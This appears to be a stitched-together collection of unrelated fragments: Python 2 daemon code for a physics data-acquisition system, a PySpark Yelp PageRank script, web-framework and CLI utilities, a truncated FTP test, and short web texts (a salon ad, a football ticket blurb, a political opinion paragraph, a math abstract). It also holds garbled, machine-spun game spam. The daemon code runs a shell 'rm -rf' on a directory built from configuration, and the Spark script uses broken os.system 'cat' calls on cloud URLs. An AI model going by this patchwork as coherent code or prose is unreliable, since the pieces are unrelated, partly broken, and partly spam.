if is_cloud_inactive():
logger.warning('received command to deactivate cloud, but cloud scripts are not running!')
extinguish_cloud()
while True:
last_status = is_cloud_inactive()
if last_status==0: #state: running
logger.info('cloud scripts are still active')
time.sleep(1)
continue
else:
logger.info('cloud scripts have been deactivated')
if last_status>1:
logger.warning('Received error code from cloud igniter script. Switching off cloud mode')
resource_lock.acquire()
resources_blocked_flag=True
cloud_mode=False
cleanup_resources()
resource_lock.release()
break
exiting_cloud_mode=False
os.remove(fullpath)
if cached_pending_run != None:
#create last pending run received during the cloud mode
time.sleep(5) #let core file notifications run
os.mkdir(cached_pending_run)
cached_pending_run = None
else: time.sleep(2)
logger.info('cloud mode in hltd has been switched off')
elif dirname.startswith('logrestart'):
#hook to restart logcollector process manually
restartLogCollector(self.instance)
os.remove(fullpath)
logger.debug("RunRanger completed handling of event "+fullpath)
def process_default(self, event):
logger.info('RunRanger: event '+event.fullpath+' type '+str(event.mask))
filename=event.fullpath[event.fullpath.rfind("/")+1:]
class ResourceRanger:
def __init__(self):
self.inotifyWrapper = InotifyWrapper(self)
self.managed_monitor = system_monitor()
self.managed_monitor.start()
self.regpath = []
def register_inotify_path(self,path,mask):
self.inotifyWrapper.registerPath(path,mask)
self.regpath.append(path)
def start_inotify(self):
self.inotifyWrapper.start()
def stop_managed_monitor(self):
self.managed_monitor.stop()
self.managed_monitor.join()
logger.info("ResourceRanger: managed monitor shutdown done")
def stop_inotify(self):
self.inotifyWrapper.stop()
self.inotifyWrapper.join()
logger.info("ResourceRanger: Inotify wrapper shutdown done")
def process_IN_MOVED_TO(self, event):
logger.debug('ResourceRanger-MOVEDTO: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
resourcepath=event.fullpath[1:event.fullpath.rfind("/")]
resourcestate=resourcepath[resourcepath.rfind("/")+1:]
resourcename=event.fullpath[event.fullpath.rfind("/")+1:]
resource_lock.acquire()
if not (resourcestate == 'online' or resourcestate == 'cloud'
or resourcestate == 'quarantined'):
logger.debug('ResourceNotifier: new resource '
+resourcename
+' in '
+resourcepath
+' state '
+resourcestate
)
if cloud_mode and not entering_cloud_mode and not exiting_cloud_mode and not abort_cloud_mode and not disabled_resource_allocation:
time.sleep(1)
logging.info('detected resource moved to non-cloud resource dir while already switched to cloud mode. Deactivating cloud.')
with open(os.path.join(conf.watch_directory,'include'),'w+') as fobj:
pass
resource_lock.release()
time.sleep(1)
return
run = runList.getLastOngoingRun()
if run is not None:
logger.info("ResourceRanger: found active run "+str(run.runnumber)+ " when received inotify MOVED event for "+event.fullpath)
"""grab resources that become available
#@@EM implement threaded acquisition of resources here
"""
#find all idle cores
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.exception(ex)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
fileFound=False
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
#acquire sufficient cores for a multithreaded process start
#returns whether it can be matched to existing online resource or not
matchedList = run.MatchResource(reslist)
if matchedList:
#matched with previous resource (restarting process)
acquired_sufficient = True
res = run.AcquireResource(matchedList,resourcestate)
else:
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
acquired_sufficient = False
if len(resourcenames) == nstreams:
acquired_sufficient = True
res = run.AcquireResource(resourcenames,resourcestate)
if acquired_sufficient:
logger.info("ResourceRanger: acquired resource(s) "+str(res.cpu))
run.StartOnResource(res)
logger.info("ResourceRanger: started process on resource "
+str(res.cpu))
else:
#if no run is active, move (x N threads) files from except to idle to be picked up for the next run
#todo: debug,write test for this...
if resourcestate == 'except':
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
if len(resourcenames) == nstreams:
for resname in resourcenames:
os.rename(broken+resname,idles+resname)
except Exception as ex:
logger.info("exception encountered in looking for resources in except")
logger.info(ex)
elif resourcestate=="cloud":
#check if cloud mode was initiated, activate if necessary
if conf.role=='fu' and cloud_mode==False:
time.sleep(1)
logging.info('detected core moved to cloud resources. Triggering cloud activation sequence.')
with open(os.path.join(conf.watch_directory,'exclude'),'w+') as fobj:
pass
time.sleep(1)
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
try:
resource_lock.release()
except:pass
def process_IN_MODIFY(self, event):
logger.debug('ResourceRanger-MODIFY: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
#this should be error (i.e. bus.confg should not be modified during a run)
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if event.fullpath == bus_config:
logger.warning("automatic remounting on changed bus.config is no longer supported. restart hltd to remount")
if False:
if self.managed_monitor:
self.managed_monitor.stop()
self.managed_monitor.join()
cleanup_mountpoints()
if self.managed_monitor:
self.managed_monitor = system_monitor()
self.managed_monitor.start()
logger.info("ResouceRanger: managed monitor is "+str(self.managed_monitor))
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
def process_IN_CREATE(self, event):
logger.debug('ResourceRanger-CREATE: event '+event.fullpath)
if conf.dqm_machine:return
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if basename=='blacklist':return
if basename.startswith('test'):return
if conf.role!='bu' or basename.endswith(os.uname()[1]):
return
try:
resourceage = os.path.getmtime(event.fullpath)
resource_lock.acquire()
lrun = runList.getLastRun()
newRes = None
if lrun!=None:
if lrun.checkStaleResourceFile(event.fullpath):
logger.error("Run "+str(lrun.runnumber)+" notification: skipping resource "+basename+" which is stale")
resource_lock.release()
return
logger.info('Try attaching FU resource: last run is '+str(lrun.runnumber))
newRes = lrun.maybeNotifyNewRun(basename,resourceage)
resource_lock.release()
if newRes:
newRes.NotifyNewRun(lrun.runnumber)
except Exception as ex:
logger.exception(ex)
try:resource_lock.release()
except:pass
def process_default(self, event):
logger.debug('ResourceRanger: event '+event.fullpath +' type '+ str(event.mask))
filename=event.fullpath[event.fullpath.rfind("/")+1:]
def process_IN_CLOSE_WRITE(self, event):
logger.debug('ResourceRanger-IN_CLOSE_WRITE: event '+event.fullpath)
global machine_blacklist
resourcepath=event.fullpath[0:event.fullpath.rfind("/")]
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if conf.role=='fu':return
if basename == os.uname()[1]:return
if basename.startswith('test'):return
if basename == 'blacklist':
with open(os.path.join(conf.watch_directory,'appliance','blacklist'),'r') as fi:
try:
machine_blacklist = json.load(fi)
except:
pass
if resourcepath.endswith('boxes'):
global boxinfoFUMap
if basename in machine_blacklist:
try:boxinfoFUMap.remove(basename)
except:pass
else:
current_time = time.time()
current_datetime = datetime.datetime.utcfromtimestamp(current_time)
emptyBox=False
try:
infile = fileHandler(event.fullpath)
if infile.data=={}:emptyBox=True
#check which time is later (in case of small clock skew and small difference)
if current_datetime > dateutil.parser.parse(infile.data['fm_date']):
dt = (current_datetime - dateutil.parser.parse(infile.data['fm_date'])).seconds
else:
dt = -(dateutil.parser.parse(infile.data['fm_date'])-current_datetime).seconds
if dt > 5:
logger.warning('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds behind')
#should be << 1s if NFS is responsive, set stale handle flag
infile.data['detectedStaleHandle']=True
elif dt < -5:
logger.error('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds ahead (clock skew)')
infile.data['detectedStaleHandle']=True
boxinfoFUMap[basename] = [infile.data,current_time,True]
except Exception as ex:
if not emptyBox:
logger.error("Unable to read of parse boxinfo file "+basename)
logger.exception(ex)
else:
logger.warning("got empty box file "+basename)
try:
boxinfoFUMap[basename][2]=False
except:
#boxinfo entry doesn't exist yet
boxinfoFUMap[basename]=[None,current_time,False]
def checkNotifiedBoxes(self,runNumber):
keys = boxinfoFUMap.keys()
c_time = time.time()
for key in keys:
#if key==thishost:continue #checked in inotify thread
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:
#key deleted
return False,False
if c_time - etime > 20:continue
#parsing or file access, check failed
if lastStatus==False: return False,False
try:
#run is found in at least one box
if runNumber in edata['activeRuns']:return True,True
except:
#invalid boxinfo data
return False,False
#all box data are valid, run not found
return True,False
def checkBoxes(self,runNumber):
checkSuccessful=True
runFound=False
ioErrCount=0
valErrCount=0
files = os.listdir(self.regpath[-1])
c_time = time.time()
for file in files:
if file == thishost:continue
#ignore file if it is too old (FU with a problem)
filename = os.path.join(dir,file)
if c_time - os.path.getmtime(filename) > 20:continue
try:
with open(filename,'r') as fp:
doc = json.load(fp)
except IOError as ex:
checkSuccessful=False
break
except ValueError as ex:
checkSuccessful=False
break
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
break;
try:
if runNumber in doc['activeRuns']:
runFound=True
break;
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
break
return checkSuccessful,runFound
class hltd(Daemon2,object):
def __init__(self, instance):
self.instance=instance
Daemon2.__init__(self,'hltd',instance,'hltd')
def stop(self):
#read configuration file
try:
setFromConf(self.instance)
except Exception as ex:
print " CONFIGURATION error:",str(ex),"(check configuration file) [ \033[1;31mFAILED\033[0;39m ]"
sys.exit(4)
if self.silentStatus():
try:
if os.path.exists(conf.watch_directory+'/populationcontrol'):
os.remove(conf.watch_directory+'/populationcontrol')
fp = open(conf.watch_directory+'/populationcontrol','w+')
fp.close()
count = 10
while count:
os.stat(conf.watch_directory+'/populationcontrol')
if count==10:
sys.stdout.write(' o.o')
else:
sys.stdout.write('o.o')
sys.stdout.flush()
time.sleep(.5)
count-=1
except OSError, err:
time.sleep(.1)
pass
except IOError, err:
time.sleep(.1)
pass
super(hltd,self).stop()
def run(self):
"""
if role is not defined in the configuration (which it shouldn't)
infer it from the name of the machine
"""
#read configuration file
setFromConf(self.instance)
logger.info(" ")
logger.info(" ")
logger.info("[[[[ ---- hltd start : instance " + self.instance + " ---- ]]]]")
logger.info(" ")
if conf.enabled==False:
logger.warning("Service is currently disabled.")
sys.exit(1)
if conf.role == 'fu':
"""
cleanup resources
"""
global cloud_mode
is_in_cloud = len(os.listdir(cloud))>0
while True:
#switch to cloud mode if cloud files are found (e.g. machine rebooted while in cloud)
if is_in_cloud:
logger.warning('found cores in cloud. this session will start in the cloud mode')
try:
move_resources_to_cloud()
except:
pass
cloud_mode=True
if is_cloud_inactive():
ignite_cloud()
break
if cleanup_resources()==True:break
time.sleep(0.1)
logger.warning("retrying cleanup_resources")
"""
recheck mount points
this is done at start and whenever the file /etc/appliance/bus.config is modified
mount points depend on configuration which may be updated (by runcontrol)
(notice that hltd does not NEED to be restarted since it is watching the file all the time)
"""
cleanup_mountpoints()
calculate_threadnumber()
try:
os.makedirs(conf.watch_directory)
except:
pass
#recursively remove any stale run data and other commands in the FU watch directory
#if conf.watch_directory.strip()!='/':
# p = subprocess.Popen("rm -rf " + conf.watch_directory.strip()+'/{run*,end*,quarantined*,exclude,include,suspend*,populationcontrol,herod,logrestart,emu*}',shell=True)
# p.wait()
if conf.watch_directory.startswith('/fff'):
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/*',shell=True)
p.wait()
global fu_watchdir_is_mountpoint
if os.path.ismount(conf.watch_directory):fu_watchdir_is_mountpoint=True
#switch to cloud mode if active and hltd did not have cores in cloud directory in the last session
if not is_in_cloud:
if not is_cloud_inactive():
logger.warning("cloud is on on this host at hltd startup, switching to cloud mode")
move_resources_to_cloud()
cloud_mode=True
if conf.role == 'bu':
global machine_blacklist
#update_success,machine_blacklist=updateBlacklist()
machine_blacklist=[]
global ramdisk_submount_size
if self.instance == 'main':
#if there are other instance mountpoints in ramdisk, they will be subtracted from size estimate
ramdisk_submount_size = submount_size(conf.watch_directory)
"""
the line below is a VERY DIRTY trick to address the fact that
BU resources are dynamic hence they should not be under /etc
"""
conf.resource_base = conf.watch_directory+'/appliance' if conf.role == 'bu' else conf.resource_base
#@SM:is running from symbolic links still needed?
watch_directory = os.readlink(conf.watch_directory) if os.path.islink(conf.watch_directory) else conf.watch_directory
resource_base = os.readlink(conf.resource_base) if os.path.islink(conf.resource_base) else conf.resource_base
global runList
runList = RunList()
if conf.use_elasticsearch == True:
time.sleep(.2)
restartLogCollector(self.instance)
#start boxinfo elasticsearch updater
global nsslock
global boxInfo
boxInfo = None
if conf.role == 'bu':
try:os.makedirs(os.path.join(watch_directory,'appliance/dn'))
except:pass
try:os.makedirs(os.path.join(watch_directory,'appliance/boxes'))
except:pass
if conf.use_elasticsearch == True:
boxInfo = BoxInfoUpdater(watch_directory,conf,nsslock,boxdoc_version)
boxInfo.start()
runRanger = RunRanger(self.instance)
runRanger.register_inotify_path(watch_directory,inotify.IN_CREATE)
runRanger.start_inotify()
logger.info("started RunRanger - watch_directory " + watch_directory)
appliance_base=resource_base
if resource_base.endswith('/'):
resource_base = resource_base[:-1]
if resource_base.rfind('/')>0:
appliance_base = resource_base[:resource_base.rfind('/')]
rr = ResourceRanger()
try:
if conf.role == 'bu':
imask = inotify.IN_CLOSE_WRITE | inotify.IN_DELETE | inotify.IN_CREATE | inotify.IN_MOVED_TO
rr.register_inotify_path(resource_base, imask)
rr.register_inotify_path(resource_base+'/boxes', imask)
else:
#status file for cloud
#with open(os.path.join(watch_directory,'mode'),'w') as fp:
# json.dump({"mode":"hlt"},fp))
#
imask_appl = inotify.IN_MODIFY
imask = inotify.IN_MOVED_TO
rr.register_inotify_path(appliance_base, imask_appl)
rr.register_inotify_path(resource_base+'/idle', imask)
rr.register_inotify_path(resource_base+'/cloud', imask)
rr.register_inotify_path(resource_base+'/except', imask)
rr.start_inotify()
logger.info("started ResourceRanger - watch_directory "+resource_base)
except Exception as ex:
logger.error("Exception caught in starting ResourceRanger notifier")
logger.error(ex)
try:
cgitb.enable(display=0, logdir="/tmp")
handler = CGIHTTPServer.CGIHTTPRequestHandler
# the following allows the base directory of the http
# server to be 'conf.watch_directory, which is writeable
# to everybody
if os.path.exists(watch_directory+'/cgi-bin'):
os.remove(watch_directory+'/cgi-bin')
os.symlink('/opt/hltd/cgi',watch_directory+'/cgi-bin')
handler.cgi_directories = ['/cgi-bin']
logger.info("starting http server on port "+str(conf.cgi_port))
httpd = BaseHTTPServer.HTTPServer(("", conf.cgi_port), handler)
logger.info("hltd serving at port "+str(conf.cgi_port)+" with role "+conf.role)
os.chdir(watch_directory)
logger.info("[[[[ ---- hltd instance " + self.instance + ": init complete, starting httpd ---- ]]]]")
logger.info("")
httpd.serve_forever()
except KeyboardInterrupt:
logger.info("stop signal detected")
aRuns = runList.getActiveRuns()
if len(aRuns)>0:
logger.info("terminating all ongoing runs")
for run in aRuns:
if conf.role=='fu':
run.Shutdown(True,True)
elif conf.role=='bu':
run.ShutdownBU()
logger.info("terminated all ongoing runs")
runRanger.stop_inotify()
rr.stop_inotify()
if boxInfo is not None:
logger.info("stopping boxinfo updater")
boxInfo.stop()
global logCollector
if logCollector is not None:
logger.info("terminating logCollector")
logCollector.terminate()
logger.info("stopping system monitor")
rr.stop_managed_monitor()
logger.info("closing httpd socket")
httpd.socket.close()
logger.info(threading.enumerate())
logger.info("unmounting mount points")
if cleanup_mountpoints(remount=False)==False:
time.sleep(1)
cleanup_mountpoints(remount=False)
logger.info("shutdown of service (main thread) completed")
except Exception as ex:
logger.info("exception encountered in operating hltd")
logger.info(ex)
runRanger.stop_inotify()
rr.stop_inotify()
rr.stop_managed_monitor()
raise
if __name__ == "__main__":
import procname
procname.setprocname('hltd')
daemon = hltd(sys.argv[1])
daemon.start()
|
In an earlier post, I noted the liberal record of unmitigated legislative disasters, the latest of which is now being played out in the financial markets before our eyes. Before the 1994 Republican takeover, Democrats had sixty years of virtually unbroken power in Congress - with substantial majorities most of the time. Can a group of smart people, studying issue after issue for years on end, with virtually unlimited resources at their command, not come up with a single policy that works? Why are they chronically incapable?
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
from pyspark.sql.functions import *
from graphframes import *
"""
If you do it on the Jupyter Notebook, do the following config.
%%configure -f
{ "conf": {"spark.jars.packages": "graphframes:graphframes:0.3.0-spark2.0-s_2.11" }}
sc.addPyFile('wasb://5003@network5003.blob.core.windows.net/graphframes-0.3.0-spark2.0-s_2.11.jar')
"""
def network(sc, spark):
# step1: create graph according to yelp network data
v = spark.read.csv(
'https://5003@network5003.blob.core.windows.net/yelpNetwork_i.csv', header=True, inferSchema=True)
# v.count() 1029432
e = spark.read.csv(
'wasb://5003@network5003.blob.core.windows.net/yelpNetwork_e.csv', header=True, inferSchema=True)
# e.count() 29723247
g = GraphFrame(v, e)
# step2: we need to make sure that this graph is a directed graph
# then we can run pagerank algorithm on it
a = g.inDegrees
# b=g.outDegrees.withColumnRenamed('id','out_id')
b = g.outDegrees
# inOut=a.join(b,a['id']==b['out_id'])
inOut = a.join(b, 'id')
static = inOut.select(
'*', (inOut['inDegree'] / inOut['outDegree']).alias('ratio')).select('id', 'ratio')
bio_ratio = float(static.filter("ratio=1").count()) / \
float(g.vertices.count())
print bio_ratio
# step3: detect connected component
sc.setCheckpointDir(
'wasb://5003@network5003.blob.core.windows.net/checkpoint')
result = g.connectedComponents()
r = result.select("id", "component")
r.groupBy('component').count().orderBy('count', ascending=False).show()
# step4: choose the largest connected component, create a new subset
# graph, and run pagerank algorithm on this new graph
subset_0 = result.filter('component=0')
subset_id = subset_0.select('id')
subset_edge = e.join(subset_id, e['dst'] == subset_0['id'], 'leftsemi').join(
subset_id, e['src'] == subset_0['id'], 'leftsemi')
g_cc = GraphFrame(subset_id, subset_edge)
pr = g_cc.pageRank(resetProbability=0.01, maxIter=10)
pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False).show()
# step5: we want to get the max pagerank vertices for each business, so we
# need (business_id,user_id) pair, extracted from review
review = spark.read.csv(
'wasb://5003@network5003.blob.core.windows.net/yelpNetwork_b_u.csv', header=True, inferSchema=True)
# but if the number of one business's comment is too small, it will be meaningless for them to distribute coupons according
# to this network's results, for they do not have enough data and do not have enough user to expand influence in cascanding.
# so we first groupBy business id and extract subset of business whose users' number is more than 100
# we consider these business is meaningful to use max pagerank user to express their coupons or make advertisement influence
# on new dishes or event
# in order to avoid spark bug on groupBy, we add withColumnRenamed before
# every groupBy operation
cnt = review.withColumnRenamed('business_id', 'business_id').groupBy(
'business_id').count().filter('count>200')
subset = cnt.join(review, 'business_id')
# pr_results_business=pr.join(subset,pr['id']==subset['user_id']).select("user_id","pagerank","business_id") /
# .withColumnRenamed('business_id','business_id').groupBy('business_id').max()
pr_table = pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False)
pr_results_business = pr_table.join(
subset, pr_table['id'] == subset['user_id'])
pr_results_business.select("user_id", "pagerank", "business_id").show()
t1 = pr_results_business.select("user_id", "pagerank", "business_id").withColumnRenamed(
'business_id', 'business_id').groupBy('business_id').max()
t2 = t1.join(pr_table, t1['max(pagerank)'] == pr_table['pagerank']).withColumnRenamed(
'id', 'user_id').select('business_id', 'user_id')
t2.show()
# step6: write result into csv file.
# For default setting, spark will write it into multi-csvfile
# distributely, we need to merge them into one csv file.
import os
from subprocess import call
t2.write.format('com.databricks.spark.csv').save(
'wasb://5003@network5003.blob.core.windows.net/result.csv')
os.system("cat wasb://5003@network5003.blob.core.windows.net/result/p* > wasb://5003@network5003.blob.core.windows.net/result.csv")
pr_table.write.format('com.databricks.spark.csv').save(
'wasb://5003@network5003.blob.core.windows.net/pr.csv')
os.system("cat wasb://5003@network5003.blob.core.windows.net/pr/p* > wasb://5003@network5003.blob.core.windows.net/pr.csv")
# evaluation
res = spark.read.csv(
'wasb://5003@network5003.blob.core.windows.net/result.csv', header=True, inferSchema=True)
cnt = 0
lgt = 0
for row in res.rdd.collect():
id = row['user_id']
print id
con = "a.id='" + id + "'"
con = str(con)
print con
top = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con).select("c.id").distinct().count()
print top
test = v.rdd.takeSample(False, 1, seed=cnt)
for t in test:
random = t['id']
con1 = "a.id='" + random + "'"
con1 = str(con1)
random = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con1).select("c.id").distinct().count()
print random
if top > random:
lgt = lgt + 1
cnt = cnt + 1
# ratio: 96.7%, means it's meaningful to use this system to recommend
# users for business
|
The Secret Therapist is passionate about transforming your beauty and well-being while offering you the chance to experience high quality treatments in a cosy, welcoming and friendly environment.
Our services at The Secret Therapist include a wide range of facials, body conditioning treatments, massage therapies, hand and foot treats, gel polish, tanning, make up and false lash application, brow and eye treatments, waxing, male grooming, packages and gift vouchers. We only use the best formulated product lines such as MONU by Susan Molyneux, Neals Yard Remedies, Fake Bake, Jessica and Leighton Denny, Mii Cosmetics and our very own (UKs first) branded Odara Mineral Beauty makeup. Luxurious quality at affordable prices. The Secret Therapist can be found in our new premises within Fit Studio in East Kilbride. We have had the pleasure of working with some of the country's elite who remain loyal to us today. Beauty and massage treatments are no longer considered a luxury but a necessity in the hectic modern world in which we now live. At The Secret Therapist, it is our aim to help alleviate some of your stresses and strains and delivering the relaxation and glamour right for your needs. Take a look at our website for more information.
Success comes from hard work and determination, from hard knocks and difficult lessons, from research and not being frightened to try something new and venture out into the unknown. We treat all our clients at a uniquely personal level from the heart and soul. We care about you and your experience turning us into the thriving company we see today!
Relax....remember it's about YOU and your commitment to one another.
Direct one-to-one contact from the beginning. A good set of ears is required. A detailed description of requirements is taken and, if possible, liaising with other organisers involved so as to avoid clashing. Our couples need to feel the can trust and rest assured they can rely on us to support their process right up till and on the big day.
Everything! The people I meet, the treatments and surroundings in which they are experienced, the chance to enjoy the products and the relationships that form.
Skincare! Putting yourself first! Start a good skincare regime at least 6 months prior to your wedding date. So often do I meet brides who, in actual fact, don't spend time on themselves really. Adopt a regular facial and body care routine. Packages can be tailored to suit and advice given free of charge.
I like to keep organised myself. Be on time. Ensure everyone is aware of who's doing what, when and where. Regular contact and great communication is imperative.
Carry a refreshing toning spritz in your bag (if you have one). Discreetly spray a mist over your face at intervals. This helps to keep cool, lower stress levels and help your makeup last longer too.
Bridebook Discount50% off all products purchased in salon.
Bridebook Special OfferFurther exclusive discounts to additional treatments and services when purchasing in conjunction with your wedding, for your guests and when returning.
|
# Copyright 2017 QuantRocket - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import yaml
import json
import requests
def json_to_cli(func, *args, **kwargs):
"""
Converts a JSON response to a more appropriate CLI response.
If JSON is preferred, the response will be returned as-is. Otherwise:
- If the JSON is a list of scalars, the output will be simplified to a
string of newline-separated values suitable for the command line (unless
simplify_lists is False).
- If the JSON is empty, nothing will be returned.
- YAML will be returned.
"""
exit_code = 0
simplify_list = kwargs.pop("simplify_list", True)
try:
json_response = func(*args, **kwargs)
except requests.exceptions.HTTPError as e:
# use json response from service, if available
json_response = getattr(e, "json_response", {}) or {"status": "error", "msg": repr(e)}
exit_code = 1
if not json_response:
return None, exit_code
if os.environ.get("QUANTROCKET_CLI_OUTPUT_FORMAT", "").lower() == "json":
return json.dumps(json_response), exit_code
if simplify_list and isinstance(json_response, list) and not any([
isinstance(item, (dict, list, tuple, set)) for item in json_response]):
return "\n".join([str(item) for item in json_response]), exit_code
return yaml.safe_dump(json_response, default_flow_style=False).strip(), exit_code
|
Tank Trouble Game Game actively playing can start a new field of journey from your home. This informative article includes advice about enhancing your game playing time with tricks and tips you possibly will not keep in mind. For further tips, continue reading.
Tank Trouble 2 Online video game playing has rapidly overtaken the world. Worldwide, people are enjoying the understanding that can be obtained together with the enjoyable. Irrespective of what you want to do, you'll locate a name to thrill you. This information has some tips on how to acquire more out of your video gaming encounter.
|
import re
from uliweb.i18n import set_language, format_locale
from uliweb import Middleware
from logging import getLogger
from uliweb.utils.common import request_url
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def get_language_from_request(request, settings):
#check query_string, and the key will be defined in settings.ini
#now only support GET method
debug = '__debug__' in request.GET
log = getLogger(__name__)
url_lang_key = settings.get_var('I18N/URL_LANG_KEY')
if url_lang_key:
lang = request.GET.get(url_lang_key)
if lang:
if debug:
log.info('Detect from URL=%s, lang_key=%s, lang=%s' %
(request_url(), url_lang_key, lang))
return lang
#check session
if hasattr(request, 'session'):
lang = request.session.get('uliweb_language')
if lang:
if debug:
log.info('Detect from session=%s, lang=%s' %
('uliweb_language', lang))
return lang
#check cookie
lang = request.cookies.get(settings.I18N.LANGUAGE_COOKIE_NAME)
if lang:
if debug:
log.info('Detect from cookie=%s, lang=%s' %
(settings.I18N.LANGUAGE_COOKIE_NAME, lang))
return lang
#check browser HTTP_ACCEPT_LANGUAGE head
accept = request.environ.get('HTTP_ACCEPT_LANGUAGE', None)
if not accept:
if debug:
log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
return settings.I18N.get('LANGUAGE_CODE')
languages = settings.I18N.get('SUPPORT_LANGUAGES', [])
for accept_lang, unused in parse_accept_lang_header(accept):
if accept_lang == '*':
break
normalized = format_locale(accept_lang)
if not normalized:
continue
if normalized in languages:
if debug:
log.info('Detect from HTTP Header=%s, lang=%s' %
('HTTP_ACCEPT_LANGUAGE', normalized))
return normalized
#return default lanaguage
lang = settings.I18N.get('LANGUAGE_CODE')
if debug:
log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
return lang
def parse_accept_lang_header(lang_string):
"""
Parses the lang_string, which is the body of an HTTP Accept-Language
header, and returns a list of (lang, q-value), ordered by 'q' values.
Any format errors in lang_string results in an empty list being returned.
"""
result = []
pieces = accept_language_re.split(lang_string)
if pieces[-1]:
return []
for i in range(0, len(pieces) - 1, 3):
first, lang, priority = pieces[i : i + 3]
if first:
return []
priority = priority and float(priority) or 1.0
result.append((lang, priority))
result.sort(lambda x, y: -cmp(x[1], y[1]))
return result
class I18nMiddle(Middleware):
def process_request(self, request):
lang = get_language_from_request(request, self.settings)
if lang:
set_language(lang)
|
Unione Sportiva Sassuolo Calcio, also known as Sassuolo or I Neroverdi (The Black-and-Greens), is a football team that currently participates in the Serie A, the top tier of the Italian football system, after becoming champions of the Serie B and achieving promotion in 2013. The club was founded in 1922 and they hold home games at the Stadio Città del Tricolore, with a capacity of 20,084 viewers. Their shirt has vertical black and green stripes, which earns them their nickname. In their track record, we can find honours such as having won the Serie B, the Serie C1, and the TIM trophy. Come watch this team on its way up in the Serie A, buy here your tickets to see Sassuolo play live.
We will notify you when tickets for Sassuolo become available.
Register for an alert when tickets are available to buy for Sassuolo.
|
#!/usr/bin/env python
# Python imports.
import sys
# Other imports.
import srl_example_setup
from simple_rl.agents import QLearningAgent, RandomAgent
from simple_rl.tasks import TaxiOOMDP
from simple_rl.run_experiments import run_agents_on_mdp, run_single_agent_on_mdp
def main(open_plot=True):
# Taxi initial state attributes..
agent = {"x":1, "y":1, "has_passenger":0}
passengers = [{"x":3, "y":2, "dest_x":2, "dest_y":3, "in_taxi":0}]
walls = []
mdp = TaxiOOMDP(width=4, height=4, agent=agent, walls=walls, passengers=passengers)
# Agents.
ql_agent = QLearningAgent(actions=mdp.get_actions())
rand_agent = RandomAgent(actions=mdp.get_actions())
viz = False
if viz:
# Visualize Taxi.
run_single_agent_on_mdp(ql_agent, mdp, episodes=50, steps=1000)
mdp.visualize_agent(ql_agent)
else:
# Run experiment and make plot.
run_agents_on_mdp([ql_agent, rand_agent], mdp, instances=10, episodes=1, steps=500, reset_at_terminal=True, open_plot=open_plot)
if __name__ == "__main__":
main(open_plot=not sys.argv[-1] == "no_plot")
|
Copyright © 1988 Derming Wang. This is an open access article distributed under the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.
It is shown that inversion is a convex function on the set of strictly positive elements of a C*-algebra.
|
#!/usr/bin/env python
from fs.tests import FSTestCases, ThreadingTestCases
import unittest
import os
import sys
import shutil
import tempfile
import subprocess
import time
from os.path import abspath
import urllib
from six import PY3
try:
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
except ImportError:
if not PY3:
raise ImportError("Requires pyftpdlib <http://code.google.com/p/pyftpdlib/>")
from fs.path import *
from fs import ftpfs
ftp_port = 30000
class TestFTPFS(unittest.TestCase, FSTestCases, ThreadingTestCases):
__test__ = not PY3
def setUp(self):
global ftp_port
ftp_port += 1
use_port = str(ftp_port)
#ftp_port = 10000
self.temp_dir = tempfile.mkdtemp(u"ftpfstests")
file_path = __file__
if ':' not in file_path:
file_path = abspath(file_path)
# Apparently Windows requires values from default environment, so copy the exisiting os.environ
env = os.environ.copy()
env['PYTHONPATH'] = os.getcwd() + os.pathsep + env.get('PYTHONPATH', '')
self.ftp_server = subprocess.Popen([sys.executable,
file_path,
self.temp_dir,
use_port],
stdout=subprocess.PIPE,
